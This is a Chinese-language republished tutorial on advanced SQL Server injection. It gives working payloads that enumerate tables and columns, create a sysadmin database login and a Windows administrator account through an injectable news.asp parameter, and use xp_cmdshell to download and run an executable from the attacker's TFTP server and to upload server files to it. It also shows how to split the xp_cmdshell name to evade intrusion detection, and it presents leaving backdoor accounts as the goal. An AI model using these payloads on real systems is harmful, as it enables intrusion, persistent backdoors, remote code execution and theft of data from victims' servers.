桂林老兵的SQLSERVER高级注入技巧

桂林老兵的SQLSERVER高级注入技巧,第1张

概述现在将老兵本人多年的SQLSERVER注入高级技巧奉献给支持老兵的朋友: 前言:即是高级技巧,其它基本的注入方法就不详述了。看不懂可查本站的注入基础文章。为了更好的用好注入,建议大家看看本站的SQL语法相关文章 [获...

现在将老兵本人多年的sqlSERVER注入高级技巧奉献给支持老兵的朋友:


前言:
即是高级技巧,其它基本的注入方法就不详述了。
看不懂可查本站的注入基础文章。
为了更好的用好注入,建议大家看看本站的sql语法相关文章


[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件]


[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_name(object_ID('要查询的数据表名'),字段列如:1) [ where 条件]


也可以这样更简捷的获取表名:


select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',…)

 

通过sqlSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSadmin组]


news.asp?ID=2;exec master.dbo.sp_addlogin test,test;-- //添加数据库用户用户test,密码为test
news.asp?ID=2;exec master.dbo.sp_password test,123456,test;-- //如果想改密码,则用这句(将test的密码改为123456)
news.asp?ID=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //将test加到sysadmin组,这个组的成员可执行任何 *** 作
news.asp?ID=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //添加系统用户test,密码为test
news.asp?ID=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //将系统用户test提升为管理员


这样,你在他的数据库和系统内都留下了test管理员账号了

 

下面是如何从你的服器下载文件file.exe后运行它[前提是你必须将你的电脑设为TFTP服务器,将69端口打开]


ID=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP get file.exe';--


然后运行这个文件:
ID=2; exec master.dbo.xp_cmdshell 'file.exe';--


下载服务器的文件file2.doc到本地TFTP服务器[文件必须存在]:


ID=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP Put file2.doc';--


绕过IDS的检测[使用变量]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:'
declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:'

总结

以上是内存溢出为你收集整理的桂林老兵的SQLSERVER高级注入技巧全部内容,希望文章能够帮你解决桂林老兵的SQLSERVER高级注入技巧所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/1210789.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-06-04
下一篇 2022-06-04

发表评论

登录后才能评论

评论列表(0条)

保存